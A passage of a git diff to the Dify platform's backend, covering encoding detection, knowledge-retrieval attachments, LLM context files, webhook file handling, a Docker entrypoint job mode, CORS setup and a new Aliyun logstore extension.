charset_normalizer import httpx from pydantic import BaseModel, Field, ValidationInfo, field_validator @@ -96,10 +97,12 @@ class HttpRequestNodeData(BaseNodeData): class Response: headers: dict[str, str] response: httpx.Response + _cached_text: str | None def __init__(self, response: httpx.Response): self.response = response self.headers = dict(response.headers) + self._cached_text = None @property def is_file(self): @@ -159,7 +162,31 @@ class Response: @property def text(self) -> str: - return self.response.text + """ + Get response text with robust encoding detection. + + Uses charset_normalizer for better encoding detection than httpx's default, + which helps handle Chinese and other non-ASCII characters properly. + """ + # Check cache first + if hasattr(self, "_cached_text") and self._cached_text is not None: + return self._cached_text + + # Try charset_normalizer for robust encoding detection first + detected_encoding = charset_normalizer.from_bytes(self.response.content).best() + if detected_encoding and detected_encoding.encoding: + try: + text = self.response.content.decode(detected_encoding.encoding) + self._cached_text = text + return text + except (UnicodeDecodeError, TypeError, LookupError): + # Fallback to httpx's encoding detection if charset_normalizer fails + pass + + # Fallback to httpx's built-in encoding detection + text = self.response.text + self._cached_text = text + return text @property def content(self) -> bytes: diff --git a/api/core/workflow/nodes/http_request/executor.py b/api/core/workflow/nodes/http_request/executor.py index 7b5b9c9e86..931c6113a7 100644 --- a/api/core/workflow/nodes/http_request/executor.py +++ b/api/core/workflow/nodes/http_request/executor.py @@ -86,6 +86,11 @@ class Executor: node_data.authorization.config.api_key = variable_pool.convert_template( node_data.authorization.config.api_key ).text + # Validate that API key is not empty after template conversion + if not node_data.authorization.config.api_key or not node_data.authorization.config.api_key.strip(): + raise AuthorizationConfigError( + "API key is required for authorization but was empty. Please provide a valid API key." + ) self.url = node_data.url self.method = node_data.method @@ -412,16 +417,20 @@ class Executor: body_string += f"--{boundary}\r\n" body_string += f'Content-Disposition: form-data; name="{key}"\r\n\r\n' # decode content safely - try: - body_string += content.decode("utf-8") - except UnicodeDecodeError: - body_string += content.decode("utf-8", errors="replace") - body_string += "\r\n" + # Do not decode binary content; use a placeholder with file metadata instead. + # Includes filename, size, and MIME type for better logging context. + body_string += ( + f"\r\n" + ) body_string += f"--{boundary}--\r\n" elif self.node_data.body: if self.content: + # If content is bytes, do not decode it; show a placeholder with size. + # Provides content size information for binary data without exposing the raw bytes. if isinstance(self.content, bytes): - body_string = self.content.decode("utf-8", errors="replace") + body_string = f"" else: body_string = self.content elif self.data and self.node_data.body.type == "x-www-form-urlencoded": diff --git a/api/core/workflow/nodes/knowledge_retrieval/entities.py b/api/core/workflow/nodes/knowledge_retrieval/entities.py index 8aa6a5016f..86bb2495e7 100644 --- a/api/core/workflow/nodes/knowledge_retrieval/entities.py +++ b/api/core/workflow/nodes/knowledge_retrieval/entities.py @@ -114,7 +114,8 @@ class KnowledgeRetrievalNodeData(BaseNodeData): """ type: str = "knowledge-retrieval" - query_variable_selector: list[str] + query_variable_selector: list[str] | None | str = None + query_attachment_selector: list[str] | None | str = None dataset_ids: list[str] retrieval_mode: Literal["single", "multiple"] multiple_retrieval_config: MultipleRetrievalConfig | None = None diff --git a/api/core/workflow/nodes/knowledge_retrieval/knowledge_retrieval_node.py b/api/core/workflow/nodes/knowledge_retrieval/knowledge_retrieval_node.py index 1b57d23e24..adc474bd60 100644 --- a/api/core/workflow/nodes/knowledge_retrieval/knowledge_retrieval_node.py +++ b/api/core/workflow/nodes/knowledge_retrieval/knowledge_retrieval_node.py @@ -25,6 +25,8 @@ from core.rag.entities.metadata_entities import Condition, MetadataCondition from core.rag.retrieval.dataset_retrieval import DatasetRetrieval from core.rag.retrieval.retrieval_methods import RetrievalMethod from core.variables import ( + ArrayFileSegment, + FileSegment, StringSegment, ) from core.variables.segments import ArrayObjectSegment @@ -119,20 +121,41 @@ class KnowledgeRetrievalNode(LLMUsageTrackingMixin, Node[KnowledgeRetrievalNodeD return "1" def _run(self) -> NodeRunResult: - # extract variables - variable = self.graph_runtime_state.variable_pool.get(self.node_data.query_variable_selector) - if not isinstance(variable, StringSegment): + if not self._node_data.query_variable_selector and not self._node_data.query_attachment_selector: return NodeRunResult( - status=WorkflowNodeExecutionStatus.FAILED, + status=WorkflowNodeExecutionStatus.SUCCEEDED, inputs={}, - error="Query variable is not string type.", - ) - query = variable.value - variables = {"query": query} - if not query: - return NodeRunResult( - status=WorkflowNodeExecutionStatus.FAILED, inputs=variables, error="Query is required." + process_data={}, + outputs={}, + metadata={}, + llm_usage=LLMUsage.empty_usage(), ) + variables: dict[str, Any] = {} + # extract variables + if self._node_data.query_variable_selector: + variable = self.graph_runtime_state.variable_pool.get(self._node_data.query_variable_selector) + if not isinstance(variable, StringSegment): + return NodeRunResult( + status=WorkflowNodeExecutionStatus.FAILED, + inputs={}, + error="Query variable is not string type.", + ) + query = variable.value + variables["query"] = query + + if self._node_data.query_attachment_selector: + variable = self.graph_runtime_state.variable_pool.get(self._node_data.query_attachment_selector) + if not isinstance(variable, ArrayFileSegment) and not isinstance(variable, FileSegment): + return NodeRunResult( + status=WorkflowNodeExecutionStatus.FAILED, + inputs={}, + error="Attachments variable is not array file or file type.", + ) + if isinstance(variable, ArrayFileSegment): + variables["attachments"] = variable.value + else: + variables["attachments"] = [variable.value] + # TODO(-LAN-): Move this check outside. # check rate limit knowledge_rate_limit = FeatureService.get_knowledge_rate_limit(self.tenant_id) @@ -161,7 +184,7 @@ class KnowledgeRetrievalNode(LLMUsageTrackingMixin, Node[KnowledgeRetrievalNodeD # retrieve knowledge usage = LLMUsage.empty_usage() try: - results, usage = self._fetch_dataset_retriever(node_data=self.node_data, query=query) + results, usage = self._fetch_dataset_retriever(node_data=self._node_data, variables=variables) outputs = {"result": ArrayObjectSegment(value=results)} return NodeRunResult( status=WorkflowNodeExecutionStatus.SUCCEEDED, @@ -198,12 +221,16 @@ class KnowledgeRetrievalNode(LLMUsageTrackingMixin, Node[KnowledgeRetrievalNodeD db.session.close() def _fetch_dataset_retriever( - self, node_data: KnowledgeRetrievalNodeData, query: str + self, node_data: KnowledgeRetrievalNodeData, variables: dict[str, Any] ) -> tuple[list[dict[str, Any]], LLMUsage]: usage = LLMUsage.empty_usage() available_datasets = [] dataset_ids = node_data.dataset_ids - + query = variables.get("query") + attachments = variables.get("attachments") + metadata_filter_document_ids = None + metadata_condition = None + metadata_usage = LLMUsage.empty_usage() # Subquery: Count the number of available documents for each dataset subquery = ( db.session.query(Document.dataset_id, func.count(Document.id).label("available_document_count")) @@ -234,13 +261,14 @@ class KnowledgeRetrievalNode(LLMUsageTrackingMixin, Node[KnowledgeRetrievalNodeD if not dataset: continue available_datasets.append(dataset) - metadata_filter_document_ids, metadata_condition, metadata_usage = self._get_metadata_filter_condition( - [dataset.id for dataset in available_datasets], query, node_data - ) - usage = self._merge_usage(usage, metadata_usage) + if query: + metadata_filter_document_ids, metadata_condition, metadata_usage = self._get_metadata_filter_condition( + [dataset.id for dataset in available_datasets], query, node_data + ) + usage = self._merge_usage(usage, metadata_usage) all_documents = [] dataset_retrieval = DatasetRetrieval() - if node_data.retrieval_mode == DatasetRetrieveConfigEntity.RetrieveStrategy.SINGLE: + if str(node_data.retrieval_mode) == DatasetRetrieveConfigEntity.RetrieveStrategy.SINGLE and query: # fetch model config if node_data.single_retrieval_config is None: raise ValueError("single_retrieval_config is required") @@ -272,7 +300,7 @@ class KnowledgeRetrievalNode(LLMUsageTrackingMixin, Node[KnowledgeRetrievalNodeD metadata_filter_document_ids=metadata_filter_document_ids, metadata_condition=metadata_condition, ) - elif node_data.retrieval_mode == DatasetRetrieveConfigEntity.RetrieveStrategy.MULTIPLE: + elif str(node_data.retrieval_mode) == DatasetRetrieveConfigEntity.RetrieveStrategy.MULTIPLE: if node_data.multiple_retrieval_config is None: raise ValueError("multiple_retrieval_config is required") if node_data.multiple_retrieval_config.reranking_mode == "reranking_model": @@ -319,6 +347,7 @@ class KnowledgeRetrievalNode(LLMUsageTrackingMixin, Node[KnowledgeRetrievalNodeD reranking_enable=node_data.multiple_retrieval_config.reranking_enable, metadata_filter_document_ids=metadata_filter_document_ids, metadata_condition=metadata_condition, + attachment_ids=[attachment.related_id for attachment in attachments] if attachments else None, ) usage = self._merge_usage(usage, dataset_retrieval.llm_usage) @@ -327,7 +356,7 @@ class KnowledgeRetrievalNode(LLMUsageTrackingMixin, Node[KnowledgeRetrievalNodeD retrieval_resource_list = [] # deal with external documents for item in external_documents: - source = { + source: dict[str, dict[str, str | Any | dict[Any, Any] | None] | Any | str | None] = { "metadata": { "_source": "knowledge", "dataset_id": item.metadata.get("dataset_id"), @@ -384,6 +413,7 @@ class KnowledgeRetrievalNode(LLMUsageTrackingMixin, Node[KnowledgeRetrievalNodeD "doc_metadata": document.doc_metadata, }, "title": document.name, + "files": list(record.files) if record.files else None, } if segment.answer: source["content"] = f"question:{segment.get_sign_content()} \nanswer:{segment.answer}" @@ -393,13 +423,21 @@ class KnowledgeRetrievalNode(LLMUsageTrackingMixin, Node[KnowledgeRetrievalNodeD if retrieval_resource_list: retrieval_resource_list = sorted( retrieval_resource_list, - key=lambda x: x["metadata"]["score"] if x["metadata"].get("score") is not None else 0.0, + key=self._score, # type: ignore[arg-type, return-value] reverse=True, ) for position, item in enumerate(retrieval_resource_list, start=1): - item["metadata"]["position"] = position + item["metadata"]["position"] = position # type: ignore[index] return retrieval_resource_list, usage + def _score(self, item: dict[str, Any]) -> float: + meta = item.get("metadata") + if isinstance(meta, dict): + s = meta.get("score") + if isinstance(s, (int, float)): + return float(s) + return 0.0 + def _get_metadata_filter_condition( self, dataset_ids: list, query: str, node_data: KnowledgeRetrievalNodeData ) -> tuple[dict[str, list[str]] | None, MetadataCondition | None, LLMUsage]: @@ -659,7 +697,10 @@ class KnowledgeRetrievalNode(LLMUsageTrackingMixin, Node[KnowledgeRetrievalNodeD typed_node_data = KnowledgeRetrievalNodeData.model_validate(node_data) variable_mapping = {} - variable_mapping[node_id + ".query"] = typed_node_data.query_variable_selector + if typed_node_data.query_variable_selector: + variable_mapping[node_id + ".query"] = typed_node_data.query_variable_selector + if typed_node_data.query_attachment_selector: + variable_mapping[node_id + ".queryAttachment"] = typed_node_data.query_attachment_selector return variable_mapping def get_model_config(self, model: ModelConfig) -> tuple[ModelInstance, ModelConfigWithCredentialsEntity]: diff --git a/api/core/workflow/nodes/llm/node.py b/api/core/workflow/nodes/llm/node.py index 1a2473e0bb..04e2802191 100644 --- a/api/core/workflow/nodes/llm/node.py +++ b/api/core/workflow/nodes/llm/node.py @@ -7,8 +7,10 @@ import time from collections.abc import Generator, Mapping, Sequence from typing import TYPE_CHECKING, Any, Literal +from sqlalchemy import select + from core.app.entities.app_invoke_entities import ModelConfigWithCredentialsEntity -from core.file import FileType, file_manager +from core.file import File, FileTransferMethod, FileType, file_manager from core.helper.code_executor import CodeExecutor, CodeLanguage from core.llm_generator.output_parser.errors import OutputParserError from core.llm_generator.output_parser.structured_output import invoke_llm_with_structured_output @@ -44,6 +46,7 @@ from core.model_runtime.utils.encoders import jsonable_encoder from core.prompt.entities.advanced_prompt_entities import CompletionModelPromptTemplate, MemoryConfig from core.prompt.utils.prompt_message_util import PromptMessageUtil from core.rag.entities.citation_metadata import RetrievalSourceMetadata +from core.tools.signature import sign_upload_file from core.variables import ( ArrayFileSegment, ArraySegment, @@ -72,6 +75,9 @@ from core.workflow.nodes.base.entities import VariableSelector from core.workflow.nodes.base.node import Node from core.workflow.nodes.base.variable_template_parser import VariableTemplateParser from core.workflow.runtime import VariablePool +from extensions.ext_database import db +from models.dataset import SegmentAttachmentBinding +from models.model import UploadFile from . import llm_utils from .entities import ( @@ -179,12 +185,17 @@ class LLMNode(Node[LLMNodeData]): # fetch context value generator = self._fetch_context(node_data=self.node_data) context = None + context_files: list[File] = [] for event in generator: context = event.context + context_files = event.context_files or [] yield event if context: node_inputs["#context#"] = context + if context_files: + node_inputs["#context_files#"] = [file.model_dump() for file in context_files] + # fetch model config model_instance, model_config = LLMNode._fetch_model_config( node_data_model=self.node_data.model, @@ -220,6 +231,7 @@ class LLMNode(Node[LLMNodeData]): variable_pool=variable_pool, jinja2_variables=self.node_data.prompt_config.jinja2_variables, tenant_id=self.tenant_id, + context_files=context_files, ) # handle invoke result @@ -322,6 +334,7 @@ class LLMNode(Node[LLMNodeData]): inputs=node_inputs, process_data=process_data, error_type=type(e).__name__, + llm_usage=usage, ) ) except Exception as e: @@ -332,6 +345,8 @@ class LLMNode(Node[LLMNodeData]): error=str(e), inputs=node_inputs, process_data=process_data, + error_type=type(e).__name__, + llm_usage=usage, ) ) @@ -654,10 +669,13 @@ class LLMNode(Node[LLMNodeData]): context_value_variable = self.graph_runtime_state.variable_pool.get(node_data.context.variable_selector) if context_value_variable: if isinstance(context_value_variable, StringSegment): - yield RunRetrieverResourceEvent(retriever_resources=[], context=context_value_variable.value) + yield RunRetrieverResourceEvent( + retriever_resources=[], context=context_value_variable.value, context_files=[] + ) elif isinstance(context_value_variable, ArraySegment): context_str = "" original_retriever_resource: list[RetrievalSourceMetadata] = [] + context_files: list[File] = [] for item in context_value_variable.value: if isinstance(item, str): context_str += item + "\n" @@ -670,9 +688,34 @@ class LLMNode(Node[LLMNodeData]): retriever_resource = self._convert_to_original_retriever_resource(item) if retriever_resource: original_retriever_resource.append(retriever_resource) - + attachments_with_bindings = db.session.execute( + select(SegmentAttachmentBinding, UploadFile) + .join(UploadFile, UploadFile.id == SegmentAttachmentBinding.attachment_id) + .where( + SegmentAttachmentBinding.segment_id == retriever_resource.segment_id, + ) + ).all() + if attachments_with_bindings: + for _, upload_file in attachments_with_bindings: + attachment_info = File( + id=upload_file.id, + filename=upload_file.name, + extension="." + upload_file.extension, + mime_type=upload_file.mime_type, + tenant_id=self.tenant_id, + type=FileType.IMAGE, + transfer_method=FileTransferMethod.LOCAL_FILE, + remote_url=upload_file.source_url, + related_id=upload_file.id, + size=upload_file.size, + storage_key=upload_file.key, + url=sign_upload_file(upload_file.id, upload_file.extension), + ) + context_files.append(attachment_info) yield RunRetrieverResourceEvent( - retriever_resources=original_retriever_resource, context=context_str.strip() + retriever_resources=original_retriever_resource, + context=context_str.strip(), + context_files=context_files, ) def _convert_to_original_retriever_resource(self, context_dict: dict) -> RetrievalSourceMetadata | None: @@ -700,6 +743,7 @@ class LLMNode(Node[LLMNodeData]): content=context_dict.get("content"), page=metadata.get("page"), doc_metadata=metadata.get("doc_metadata"), + files=context_dict.get("files"), ) return source @@ -741,6 +785,7 @@ class LLMNode(Node[LLMNodeData]): variable_pool: VariablePool, jinja2_variables: Sequence[VariableSelector], tenant_id: str, + context_files: list["File"] | None = None, ) -> tuple[Sequence[PromptMessage], Sequence[str] | None]: prompt_messages: list[PromptMessage] = [] @@ -853,6 +898,23 @@ class LLMNode(Node[LLMNodeData]): else: prompt_messages.append(UserPromptMessage(content=file_prompts)) + # The context_files + if vision_enabled and context_files: + file_prompts = [] + for file in context_files: + file_prompt = file_manager.to_prompt_message_content(file, image_detail_config=vision_detail) + file_prompts.append(file_prompt) + # If last prompt is a user prompt, add files into its contents, + # otherwise append a new user prompt + if ( + len(prompt_messages) > 0 + and isinstance(prompt_messages[-1], UserPromptMessage) + and isinstance(prompt_messages[-1].content, list) + ): + prompt_messages[-1] = UserPromptMessage(content=file_prompts + prompt_messages[-1].content) + else: + prompt_messages.append(UserPromptMessage(content=file_prompts)) + # Remove empty messages and filter unsupported content filtered_prompt_messages = [] for prompt_message in prompt_messages: diff --git a/api/core/workflow/nodes/question_classifier/question_classifier_node.py b/api/core/workflow/nodes/question_classifier/question_classifier_node.py index db3d4d4aac..4a3e8e56f8 100644 --- a/api/core/workflow/nodes/question_classifier/question_classifier_node.py +++ b/api/core/workflow/nodes/question_classifier/question_classifier_node.py @@ -221,6 +221,7 @@ class QuestionClassifierNode(Node[QuestionClassifierNodeData]): status=WorkflowNodeExecutionStatus.FAILED, inputs=variables, error=str(e), + error_type=type(e).__name__, metadata={ WorkflowNodeExecutionMetadataKey.TOTAL_TOKENS: usage.total_tokens, WorkflowNodeExecutionMetadataKey.TOTAL_PRICE: usage.total_price, diff --git a/api/core/workflow/nodes/start/start_node.py b/api/core/workflow/nodes/start/start_node.py index 38effa79f7..36fc5078c5 100644 --- a/api/core/workflow/nodes/start/start_node.py +++ b/api/core/workflow/nodes/start/start_node.py @@ -1,3 +1,4 @@ +import json from typing import Any from jsonschema import Draft7Validator, ValidationError @@ -42,15 +43,25 @@ class StartNode(Node[StartNodeData]): if value is None and variable.required: raise ValueError(f"{key} is required in input form") - if not isinstance(value, dict): - raise ValueError(f"{key} must be a JSON object") - schema = variable.json_schema if not schema: continue + if not value: + continue + try: - Draft7Validator(schema).validate(value) + json_schema = json.loads(schema) + except json.JSONDecodeError as e: + raise ValueError(f"{schema} must be a valid JSON object") + + try: + json_value = json.loads(value) + except json.JSONDecodeError as e: + raise ValueError(f"{value} must be a valid JSON object") + + try: + Draft7Validator(json_schema).validate(json_value) except ValidationError as e: raise ValueError(f"JSON object for '{key}' does not match schema: {e.message}") - node_inputs[key] = value + node_inputs[key] = json_value diff --git a/api/core/workflow/nodes/trigger_webhook/node.py b/api/core/workflow/nodes/trigger_webhook/node.py index 3631c8653d..ec8c4b8ee3 100644 --- a/api/core/workflow/nodes/trigger_webhook/node.py +++ b/api/core/workflow/nodes/trigger_webhook/node.py @@ -1,14 +1,22 @@ +import logging from collections.abc import Mapping from typing import Any +from core.file import FileTransferMethod +from core.variables.types import SegmentType +from core.variables.variables import FileVariable from core.workflow.constants import SYSTEM_VARIABLE_NODE_ID from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus from core.workflow.enums import NodeExecutionType, NodeType from core.workflow.node_events import NodeRunResult from core.workflow.nodes.base.node import Node +from factories import file_factory +from factories.variable_factory import build_segment_with_type from .entities import ContentType, WebhookData +logger = logging.getLogger(__name__) + class TriggerWebhookNode(Node[WebhookData]): node_type = NodeType.TRIGGER_WEBHOOK @@ -60,6 +68,34 @@ class TriggerWebhookNode(Node[WebhookData]): outputs=outputs, ) + def generate_file_var(self, param_name: str, file: dict): + related_id = file.get("related_id") + transfer_method_value = file.get("transfer_method") + if transfer_method_value: + transfer_method = FileTransferMethod.value_of(transfer_method_value) + match transfer_method: + case FileTransferMethod.LOCAL_FILE | FileTransferMethod.REMOTE_URL: + file["upload_file_id"] = related_id + case FileTransferMethod.TOOL_FILE: + file["tool_file_id"] = related_id + case FileTransferMethod.DATASOURCE_FILE: + file["datasource_file_id"] = related_id + + try: + file_obj = file_factory.build_from_mapping( + mapping=file, + tenant_id=self.tenant_id, + ) + file_segment = build_segment_with_type(SegmentType.FILE, file_obj) + return FileVariable(name=param_name, value=file_segment.value, selector=[self.id, param_name]) + except ValueError: + logger.error( + "Failed to build FileVariable for webhook file parameter %s", + param_name, + exc_info=True, + ) + return None + def _extract_configured_outputs(self, webhook_inputs: dict[str, Any]) -> dict[str, Any]: """Extract outputs based on node configuration from webhook inputs.""" outputs = {} @@ -107,18 +143,33 @@ class TriggerWebhookNode(Node[WebhookData]): outputs[param_name] = str(webhook_data.get("body", {}).get("raw", "")) continue elif self.node_data.content_type == ContentType.BINARY: - outputs[param_name] = webhook_data.get("body", {}).get("raw", b"") + raw_data: dict = webhook_data.get("body", {}).get("raw", {}) + file_var = self.generate_file_var(param_name, raw_data) + if file_var: + outputs[param_name] = file_var + else: + outputs[param_name] = raw_data continue if param_type == "file": # Get File object (already processed by webhook controller) - file_obj = webhook_data.get("files", {}).get(param_name) - outputs[param_name] = file_obj + files = webhook_data.get("files", {}) + if files and isinstance(files, dict): + file = files.get(param_name) + if file and isinstance(file, dict): + file_var = self.generate_file_var(param_name, file) + if file_var: + outputs[param_name] = file_var + else: + outputs[param_name] = files + else: + outputs[param_name] = files + else: + outputs[param_name] = files else: # Get regular body parameter outputs[param_name] = webhook_data.get("body", {}).get(param_name) # Include raw webhook data for debugging/advanced use outputs["_webhook_raw"] = webhook_data - return outputs diff --git a/api/core/workflow/workflow_entry.py b/api/core/workflow/workflow_entry.py index d4ec29518a..ddf545bb34 100644 --- a/api/core/workflow/workflow_entry.py +++ b/api/core/workflow/workflow_entry.py @@ -14,7 +14,7 @@ from core.workflow.errors import WorkflowNodeRunFailedError from core.workflow.graph import Graph from core.workflow.graph_engine import GraphEngine from core.workflow.graph_engine.command_channels import InMemoryChannel -from core.workflow.graph_engine.layers import DebugLoggingLayer, ExecutionLimitsLayer +from core.workflow.graph_engine.layers import DebugLoggingLayer, ExecutionLimitsLayer, ObservabilityLayer from core.workflow.graph_engine.protocols.command_channel import CommandChannel from core.workflow.graph_events import GraphEngineEvent, GraphNodeEventBase, GraphRunFailedEvent from core.workflow.nodes import NodeType @@ -23,6 +23,7 @@ from core.workflow.nodes.node_mapping import NODE_TYPE_CLASSES_MAPPING from core.workflow.runtime import GraphRuntimeState, VariablePool from core.workflow.system_variable import SystemVariable from core.workflow.variable_loader import DUMMY_VARIABLE_LOADER, VariableLoader, load_into_variable_pool +from extensions.otel.runtime import is_instrument_flag_enabled from factories import file_factory from models.enums import UserFrom from models.workflow import Workflow @@ -98,6 +99,10 @@ class WorkflowEntry: ) self.graph_engine.layer(limits_layer) + # Add observability layer when OTel is enabled + if dify_config.ENABLE_OTEL or is_instrument_flag_enabled(): + self.graph_engine.layer(ObservabilityLayer()) + def run(self) -> Generator[GraphEngineEvent, None, None]: graph_engine = self.graph_engine diff --git a/api/docker/entrypoint.sh b/api/docker/entrypoint.sh index 6313085e64..5a69eb15ac 100755 --- a/api/docker/entrypoint.sh +++ b/api/docker/entrypoint.sh @@ -34,10 +34,10 @@ if [[ "${MODE}" == "worker" ]]; then if [[ -z "${CELERY_QUEUES}" ]]; then if [[ "${EDITION}" == "CLOUD" ]]; then # Cloud edition: separate queues for dataset and trigger tasks - DEFAULT_QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow_professional,workflow_team,workflow_sandbox,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor" + DEFAULT_QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow_professional,workflow_team,workflow_sandbox,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention" else # Community edition (SELF_HOSTED): dataset, pipeline and workflow have separate queues - DEFAULT_QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor" + DEFAULT_QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention" fi else DEFAULT_QUEUES="${CELERY_QUEUES}" @@ -69,6 +69,53 @@ if [[ "${MODE}" == "worker" ]]; then elif [[ "${MODE}" == "beat" ]]; then exec celery -A app.celery beat --loglevel ${LOG_LEVEL:-INFO} + +elif [[ "${MODE}" == "job" ]]; then + # Job mode: Run a one-time Flask command and exit + # Pass Flask command and arguments via container args + # Example K8s usage: + # args: + # - create-tenant + # - --email + # - admin@example.com + # + # Example Docker usage: + # docker run -e MODE=job dify-api:latest create-tenant --email admin@example.com + + if [[ $# -eq 0 ]]; then + echo "Error: No command specified for job mode." + echo "" + echo "Usage examples:" + echo " Kubernetes:" + echo " args: [create-tenant, --email, admin@example.com]" + echo "" + echo " Docker:" + echo " docker run -e MODE=job dify-api create-tenant --email admin@example.com" + echo "" + echo "Available commands:" + echo " create-tenant, reset-password, reset-email, upgrade-db," + echo " vdb-migrate, install-plugins, and more..." + echo "" + echo "Run 'flask --help' to see all available commands." + exit 1 + fi + + echo "Running Flask job command: flask $*" + + # Temporarily disable exit on error to capture exit code + set +e + flask "$@" + JOB_EXIT_CODE=$? + set -e + + if [[ ${JOB_EXIT_CODE} -eq 0 ]]; then + echo "Job completed successfully." + else + echo "Job failed with exit code ${JOB_EXIT_CODE}." + fi + + exit ${JOB_EXIT_CODE} + else if [[ "${DEBUG}" == "true" ]]; then exec flask run --host=${DIFY_BIND_ADDRESS:-0.0.0.0} --port=${DIFY_PORT:-5001} --debug diff --git a/api/events/event_handlers/clean_when_dataset_deleted.py b/api/events/event_handlers/clean_when_dataset_deleted.py index 1666e2e29f..d6007662d8 100644 --- a/api/events/event_handlers/clean_when_dataset_deleted.py +++ b/api/events/event_handlers/clean_when_dataset_deleted.py @@ -15,4 +15,5 @@ def handle(sender: Dataset, **kwargs): dataset.index_struct, dataset.collection_binding_id, dataset.doc_form, + dataset.pipeline_id, ) diff --git a/api/extensions/ext_blueprints.py b/api/extensions/ext_blueprints.py index 725e5351e6..cf994c11df 100644 --- a/api/extensions/ext_blueprints.py +++ b/api/extensions/ext_blueprints.py @@ -9,11 +9,21 @@ FILES_HEADERS: tuple[str, ...] = (*BASE_CORS_HEADERS, HEADER_NAME_CSRF_TOKEN) EXPOSED_HEADERS: tuple[str, ...] = ("X-Version", "X-Env", "X-Trace-Id") -def init_app(app: DifyApp): - # register blueprint routers +def _apply_cors_once(bp, /, **cors_kwargs): + """Make CORS idempotent so blueprints can be reused across multiple app instances.""" + + if getattr(bp, "_dify_cors_applied", False): + return from flask_cors import CORS + CORS(bp, **cors_kwargs) + bp._dify_cors_applied = True + + +def init_app(app: DifyApp): + # register blueprint routers + from controllers.console import bp as console_app_bp from controllers.files import bp as files_bp from controllers.inner_api import bp as inner_api_bp @@ -22,7 +32,7 @@ def init_app(app: DifyApp): from controllers.trigger import bp as trigger_bp from controllers.web import bp as web_bp - CORS( + _apply_cors_once( service_api_bp, allow_headers=list(SERVICE_API_HEADERS), methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH"], @@ -30,7 +40,7 @@ def init_app(app: DifyApp): ) app.register_blueprint(service_api_bp) - CORS( + _apply_cors_once( web_bp, resources={r"/*": {"origins": dify_config.WEB_API_CORS_ALLOW_ORIGINS}}, supports_credentials=True, @@ -40,7 +50,7 @@ def init_app(app: DifyApp): ) app.register_blueprint(web_bp) - CORS( + _apply_cors_once( console_app_bp, resources={r"/*": {"origins": dify_config.CONSOLE_CORS_ALLOW_ORIGINS}}, supports_credentials=True, @@ -50,7 +60,7 @@ def init_app(app: DifyApp): ) app.register_blueprint(console_app_bp) - CORS( + _apply_cors_once( files_bp, allow_headers=list(FILES_HEADERS), methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH"], @@ -62,7 +72,7 @@ def init_app(app: DifyApp): app.register_blueprint(mcp_bp) # Register trigger blueprint with CORS for webhook calls - CORS( + _apply_cors_once( trigger_bp, allow_headers=["Content-Type", "Authorization", "X-App-Code"], methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH", "HEAD"], diff --git a/api/extensions/ext_logstore.py b/api/extensions/ext_logstore.py new file mode 100644 index 0000000000..502f0bb46b --- /dev/null +++ b/api/extensions/ext_logstore.py @@ -0,0 +1,74 @@ +""" +Logstore extension for Dify application. + +This extension initializes the logstore (Aliyun SLS) on application startup, +creating necessary projects, logstores, and indexes if they don't exist. +""" + +import logging +import os + +from dotenv import load_dotenv + +from dify_app import DifyApp + +logger = logging.getLogger(__name__) + + +def is_enabled() -> bool: + """ + Check if logstore extension is enabled. + + Returns: + True if all required Aliyun SLS environment variables are set, False otherwise + """ + # Load environment variables from .env file + load_dotenv() + + required_vars = [ + "ALIYUN_SLS_ACCESS_KEY_ID", + "ALIYUN_SLS_ACCESS_KEY_SECRET", + "ALIYUN_SLS_ENDPOINT", + "ALIYUN_SLS_REGION", + "ALIYUN_SLS_PROJECT_NAME", + ] + + all_set = all(os.environ.get(var) for var in required_vars) + + if not all_set: + logger.info("Logstore extension disabled: required Aliyun SLS environment variables not set") + + return all_set + + +def init_app(app: DifyApp): + """ + Initialize logstore on application startup. + + This function: + 1. Creates Aliyun SLS project if it doesn't exist + 2. Creates logstores (workflow_execution, workflow_node_execution) if they don't exist + 3. Creates indexes with field configurations based on PostgreSQL table structures + + This operation is idempotent and only executes once during application startup. + + Args: + app: The Dify application instance + """ + try: + from extensions.logstore.aliyun_logstore import AliyunLogStore + + logger.info("Initializing logstore...") + + # Create logstore client and initialize project/logstores/indexes + logstore_client = AliyunLogStore() + logstore_client.init_project_logstore() + + # Attach to app for potential later use + app.extensions["logstore"] = logstore_client + + logger.info("Logstore initialized successfully") + except Exception: + logger.exception("Failed to initialize logstore") + # Don't raise - allow application to continue even if logstore init fails + # This ensures that the application can still run if logstore is misconfigured diff --git a/api/extensions/ext_session_factory.py b/api/extensions/ext_session_factory.py new file mode 100644 index 0000000000..0eb43d66f4 --- /dev/null +++ b/api/extensions/ext_session_factory.py @@ -0,0 +1,7 @@ +from core.db.session_factory import configure_session_factory +from extensions.ext_database import db + + +def init_app(app): + with app.app_context(): + configure_session_factory(db.engine) diff --git a/api/extensions/logstore/__init__.py b/api/extensions/logstore/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/extensions/logstore/aliyun_logstore.py b/api/extensions/logstore/aliyun_logstore.py new file mode 100644 index 0000000000..22d1f473a3 --- /dev/null +++ b/api/extensions/logstore/aliyun_logstore.py @@ -0,0 +1,890 @@ +import logging +import os +import threading +import time +from collections.abc import Sequence +from typing import Any + +import sqlalchemy as sa +from aliyun.log import ( # type: ignore[import-untyped] + GetLogsRequest, + IndexConfig, + IndexKeyConfig, + IndexLineConfig, + LogClient, + LogItem, + PutLogsRequest, +) +from aliyun.log.auth import AUTH_VERSION_4 # type: ignore[import-untyped] +from aliyun.log.logexception import LogException # type: ignore[import-untyped] +from dotenv import load_dotenv +from sqlalchemy.orm import DeclarativeBase + +from configs import dify_config +from extensions.logstore.aliyun_logstore_pg import AliyunLogStorePG + +logger = 